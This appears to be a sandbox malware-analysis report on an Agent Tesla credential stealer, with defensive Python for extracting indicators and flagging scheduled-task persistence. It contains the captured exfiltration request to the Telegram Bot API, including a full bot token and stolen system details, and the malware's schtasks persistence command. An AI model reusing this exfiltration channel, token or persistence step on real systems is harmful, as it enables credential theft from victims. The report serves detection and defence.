                                                              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1639
                                                              Entropy (8bit):5.176570919099634
                                                              Encrypted:false
                                                              SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGeqPtn:cbhK79lNQR/rydbz9I3YODOLNdq3o
                                                              MD5:D5AA884ABE3D992356979DFDD919B7C7
                                                              SHA1:446F3B70108DA9EB94D12C50C19CD6F0D3246900
                                                              SHA-256:2033AB7915223FA9ECB27E540E8E035A947ABE50C7769458C1986E8F821EE3BB
                                                              SHA-512:B1C468E0761BE17D1A0EC8C7F687F9456F7EEDC79D94BC327566CA65829B29DCD1030FBC1B0112773BFDDA4F3DD46397A7DC0A5FF4EBA4BC1716FDE0B9D9325B
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):862720
                                                              Entropy (8bit):7.766023507269692
                                                              Encrypted:false
                                                              SSDEEP:12288:5K2iN4JgEexUMfDLBv0QzDHvGtkLwKHkfmsEX4R54rhtjDDgCze9uJ:5K1a+EOUov0+DHOEwbej2wMKe
                                                              MD5:8577851A51C92B4D637B3AC6F58763A1
                                                              SHA1:EB981F97BD164FC30A36EACEFEE119BD90DB9ED9
                                                              SHA-256:F39991524680779F0C158A55FDD1D2C2802D88BC36C341C97B60756312DBE1CC
                                                              SHA-512:1B887CF7BE213D52AB87E0194CDD9F7E99C50FCA39FE7DD7E0652907F04F2DDB4BA8A325B4CB1A65EB0632AA67487DE514F726BA88DB519FBF9E3320AC9463F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b................. ...........>... ........@.. ....................................@..................................>..S....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............q..............XL............................................(....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o......,.r...p......(....s....z..+..s..........~.........(.....o......(...+..tu....%-.&.+.%(........o................&r;..p..
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.766023507269692
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:NEW ORDER.exe
                                                              File size:862720
                                                              MD5:8577851a51c92b4d637b3ac6f58763a1
                                                              SHA1:eb981f97bd164fc30a36eacefee119bd90db9ed9
                                                              SHA256:f39991524680779f0c158a55fdd1d2c2802d88bc36c341c97b60756312dbe1cc
                                                              SHA512:1b887cf7be213d52ab87e0194cdd9f7e99c50fca39fe7dd7e0652907f04f2ddb4ba8a325b4cb1a65eb0632aa67487de514f726ba88db519fbf9e3320ac9463f7
                                                              SSDEEP:12288:5K2iN4JgEexUMfDLBv0QzDHvGtkLwKHkfmsEX4R54rhtjDDgCze9uJ:5K1a+EOUov0+DHOEwbej2wMKe
                                                              TLSH:5805F1F156F97528F034237236D0A07C7BE2E91BDA05D23A5D7B930E9752DC186E2A23
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b................. ...........>... ........@.. ....................................@................................
                                                              Icon Hash:00828e8e8686b000
                                                              Entrypoint:0x4d3ede
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x62F0F8B1 [Mon Aug 8 11:51:13 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(The line "add byte ptr [eax], al" repeats for the rest of the disassembled window. The entry point is the standard six-byte stub of a 32-bit .NET executable: an indirect jump through the IAT slot at 0x402000, that is image base 0x400000 plus the IMAGE_DIRECTORY_ENTRY_IAT offset 0x2000, which holds the file's only import, mscoree.dll!_CorExeMain. Everything after the stub is zero padding, and the byte pair 00 00 disassembles as "add byte ptr [eax], al".)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd3e88          0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd4000          0x600         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xd1ee4       0xd2000   False     0.8591878255208333  data       7.7728861482664335   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xd4000          0x600         0x600     False     0.4264322916666667  data       4.095928346302954    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xd6000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                        Language  Country
RT_VERSION   0xd4090  0x324  data
RT_MANIFEST  0xd43c4  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
08/08/22-17:42:49.480990  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  23153        443        192.168.2.4  149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Aug 8, 2022 17:42:48.335764885 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:48.335808039 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:48.335917950 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:48.415303946 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:48.415359020 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:48.479599953 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:48.479718924 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:48.482686996 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:48.482709885 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:48.482904911 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:48.562361002 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:49.452589035 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:49.479407072 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:49.480860949 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:49.523380041 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:49.577591896 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:49.577666044 CEST  443          49755      149.154.167.220  192.168.2.4
Aug 8, 2022 17:42:49.577759981 CEST  49755        443        192.168.2.4      149.154.167.220
Aug 8, 2022 17:42:49.578996897 CEST  49755        443        192.168.2.4      149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Aug 8, 2022 17:42:48.270077944 CEST  53775        53         192.168.2.4  8.8.8.8
Aug 8, 2022 17:42:48.287147999 CEST  53           53775      8.8.8.8      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class
Aug 8, 2022 17:42:48.270077944 CEST  192.168.2.4  8.8.8.8  0x6a39    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class
Aug 8, 2022 17:42:48.287147999 CEST  8.8.8.8    192.168.2.4  0x6a39    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)
                                                              • api.telegram.org
Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.4  23153        149.154.167.220  443               C:\Users\user\Desktop\NEW ORDER.exe
Timestamp                kBytes transferred  Direction  Data
2022-08-08 15:42:49 UTC  0                   OUT        POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4
                                                              Host: api.telegram.org
                                                              Content-Length: 770
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
2022-08-08 15:42:49 UTC  0                   IN         HTTP/1.1 100 Continue
2022-08-08 15:42:49 UTC  0                   OUT        Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 39 37 32 38 37 33 34 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 39 32 38 31 30 30 0a 4f 53 46 75 6c 6c
Data Ascii: -----------------------------8da7969e2d70cb4Content-Disposition: form-data; name="chat_id"5597287344-----------------------------8da7969e2d70cb4Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/928100OSFull
2022-08-08 15:42:49 UTC  1                   IN         HTTP/1.1 200 OK
                                                              Server: nginx/1.18.0
                                                              Date: Mon, 08 Aug 2022 15:42:49 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 603
                                                              Connection: close
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                              {"ok":true,"result":{"message_id":493,"from":{"id":5400730219,"is_bot":true,"first_name":"igna_bot","username":"ignebot"},"chat":{"id":5597287344,"first_name":"King","last_name":"Mike","type":"private"},"date":1659973369,"document":{"file_name":"user-928100 2022-08-08 06-14-34.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIB7WLxLvnOVwdyVZpDs7AEmFk9jb3rAALvDAACNLmIUy4FUt_2dWo2KQQ","file_unique_id":"AgAD7wwAAjS5iFM","file_size":200},"caption":"New PW Recovered!\n\nUser Name: user/928100\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
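The POST above is the exfiltration step the Snort signature fires on: the bot token sits in the URL path, chat_id and caption travel as multipart form fields, and the 200 response echoes the bot and chat identities back. The following Python is an added example (it is not part of the Joe Sandbox report and not the sample's own code) of pulling those indicators out of the captured request the way one would from a PCAP. The request line, the Content-Type header and the raw body bytes are taken from the report's HTTP log; the body is cut where the report cuts it, so the parser also reports that the closing boundary is missing.

```python
import re

# Request line and Content-Type header as captured in the report's HTTP log
# (the boundary is 27 dashes followed by the hex suffix).
REQUEST_LINE = "POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1"
CONTENT_TYPE = "multipart/form-data; boundary=" + "-" * 27 + "8da7969e2d70cb4"

# The report's "Data Raw" hex dump of the request body, reflowed onto several
# lines. The sandbox truncates it in the middle of the caption field, so the
# closing "--boundary--" delimiter is absent from this capture.
BODY_HEX = """
0d 0a
2d 2d 2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d 2d
38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a
35 35 39 37 32 38 37 33 34 34 0d 0a
2d 2d 2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d 2d
38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a
4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a
55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 39 32 38 31 30 30 0a
4f 53 46 75 6c 6c
"""
BODY = bytes.fromhex(BODY_HEX)

# Bot API target: /bot<numeric id>:<35-char secret>/<method>. The id:secret pair
# is the bot token, i.e. the credential the operator uses for this channel.
TOKEN_RE = re.compile(r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)")


def parse_request_line(line: str) -> dict:
    """Extract bot id, token secret and API method from the request target."""
    m = TOKEN_RE.search(line)
    if not m:
        raise ValueError("not a Telegram Bot API request line")
    return m.groupdict()


def boundary_from_content_type(value: str) -> bytes:
    """Return the multipart boundary parameter (quoted or bare) as bytes."""
    m = re.search(r'boundary=("?)([^";]+)\1', value)
    if not m:
        raise ValueError("Content-Type carries no multipart boundary")
    return m.group(2).encode()


def parse_multipart(body: bytes, boundary: bytes) -> tuple:
    """Split a multipart/form-data body into ({field name: raw bytes}, complete).

    complete is False when the closing "--boundary--" delimiter never appears,
    which is what a truncated capture looks like; fields seen before the cut
    are still returned, and the last one may itself be partial.
    """
    delim = b"--" + boundary
    fields = {}
    complete = False
    for part in body.split(delim)[1:]:          # [0] is the preamble
        if part.startswith(b"--"):              # closing delimiter
            complete = True
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                             # cut off inside the part headers
            continue
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        if value.endswith(b"\r\n"):             # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode()] = value
    return fields, complete


def extract_iocs(request_line: str, content_type: str, body: bytes) -> dict:
    """Combine the URL-borne credential with the form fields of the upload."""
    iocs = parse_request_line(request_line)
    fields, complete = parse_multipart(body, boundary_from_content_type(content_type))
    iocs["chat_id"] = fields.get("chat_id", b"").decode("utf-8", "replace")
    iocs["caption"] = fields.get("caption", b"").decode("utf-8", "replace")
    iocs["body_complete"] = complete
    return iocs


if __name__ == "__main__":
    for key, val in extract_iocs(REQUEST_LINE, CONTENT_TYPE, BODY).items():
        print(f"{key}: {val!r}")
```

Decoding the raw bytes rather than trusting the rendered Data Ascii column matters here: the caption as actually transmitted spells the User Name field differently from the rendered line in the report, so indicators should be taken from the hex. The bot id and chat id the parser returns are the same ones that appear in the API's JSON reply, which is how the reply confirms that the upload succeeded.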



                                                              Target ID:0
                                                              Start time:17:42:10
                                                              Start date:08/08/2022
                                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\NEW ORDER.exe"
                                                              Imagebase:0x960000
                                                              File size:862720 bytes
                                                              MD5 hash:8577851A51C92B4D637B3AC6F58763A1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              Target ID:4
                                                              Start time:17:42:26
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp"
                                                              Imagebase:0x170000
                                                              File size:185856 bytes
                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
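The schtasks call above is the persistence step: the sample writes the task definition to a tmpXXXX.tmp file in its Temp directory (the XML previewed in the dropped-files list, with a logon trigger for the current user at least privilege) and registers it under Updates\HvabCK. As an added example that is not part of the report, the Python below scores process-creation records for that pattern. The records are constructed for the example, modelled on Sysmon event 1 fields; the first reproduces this report's command line and parent process with the quoting restored, the other two are benign contrasts.

```python
import re

# Constructed process-creation records in the shape of Sysmon event 1 fields
# (ParentImage, Image, CommandLine). The first reproduces the schtasks call from
# this report with its quoting restored; the other two are made-up contrasts.
EVENTS = [
    {
        "parent_image": r"C:\Users\user\Desktop\NEW ORDER.exe",
        "image": r"C:\Windows\SysWOW64\schtasks.exe",
        "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp"',
    },
    {   # an installer registering a task from its own directory (constructed)
        "parent_image": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks.exe /Create /TN "ExampleVendor\Updater" /XML "C:\Program Files\ExampleVendor\updater-task.xml"',
    },
    {   # a query, not a registration (constructed)
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r"schtasks.exe /Query /TN \Updates\HvabCK",
    },
]

# /Switch followed by an optional value, quoted or bare. Bare values may not
# start with '/', so "/Create /TN" does not swallow "/TN" as Create's value.
SWITCH_RE = re.compile(r'/(?P<name>[A-Za-z]+)(?:\s+(?:"(?P<q>[^"]*)"|(?P<b>[^\s/"]\S*)))?')

# tmpXXXX.tmp under %LOCALAPPDATA%\Temp is the name Path.GetTempFileName() hands
# out, which is how this sample staged the task XML before calling schtasks.
TEMP_XML_RE = re.compile(r"\\AppData\\Local\\Temp\\tmp[0-9A-Fa-f]{4}\.tmp$", re.IGNORECASE)


def parse_switches(cmdline: str) -> dict:
    """Return {switch (lower-case): value or None} for a schtasks command line."""
    switches = {}
    for m in SWITCH_RE.finditer(cmdline):
        value = m.group("q") if m.group("q") is not None else m.group("b")
        switches[m.group("name").lower()] = value
    return switches


def score_event(event: dict) -> list:
    """Reasons a process-creation record looks like schtasks-based persistence.

    An empty list means the record is not a schtasks /Create, or it tripped
    none of the checks.
    """
    if not event["image"].lower().endswith("\\schtasks.exe"):
        return []
    sw = parse_switches(event["cmdline"])
    if "create" not in sw:
        return []
    reasons = []
    xml_path = sw.get("xml") or ""
    if TEMP_XML_RE.search(xml_path):
        reasons.append("task XML supplied from a tmpXXXX.tmp file in the user's Temp directory")
    parent = event["parent_image"].lower()
    if parent.startswith("c:\\users\\"):
        reasons.append("created by a process running from a user-writable path: " + event["parent_image"])
    task_name = (sw.get("tn") or "").lower()
    if task_name.startswith("updates\\"):
        reasons.append('task placed in the "Updates\\" folder, as in this sample')
    return reasons


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["cmdline"])
        for reason in score_event(ev) or ["no findings"]:
            print("  -", reason)
```

The switch parser is deliberately simple: it assumes values containing a forward slash are quoted, which is true of the paths and task names in this report. The Temp-file check is the strongest of the three signals, because a legitimate installer has no reason to hand schtasks a file that Path.GetTempFileName() created moments earlier; the parent-path and folder-name checks are corroboration rather than detections on their own.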

                                                              Target ID:5
                                                              Start time:17:42:27
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff647620000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:7
                                                              Start time:17:42:28
                                                              Start date:08/08/2022
                                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:{path}
                                                              Imagebase:0x740000
                                                              File size:862720 bytes
                                                              MD5 hash:8577851A51C92B4D637B3AC6F58763A1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 24
Start time: 17:43:32
Start date: 08/08/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff7338d0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 25
Start time: 17:43:33
Start date: 08/08/2022
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
Imagebase: 0x7ff770e00000
File size: 494488 bytes
MD5 hash: 2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly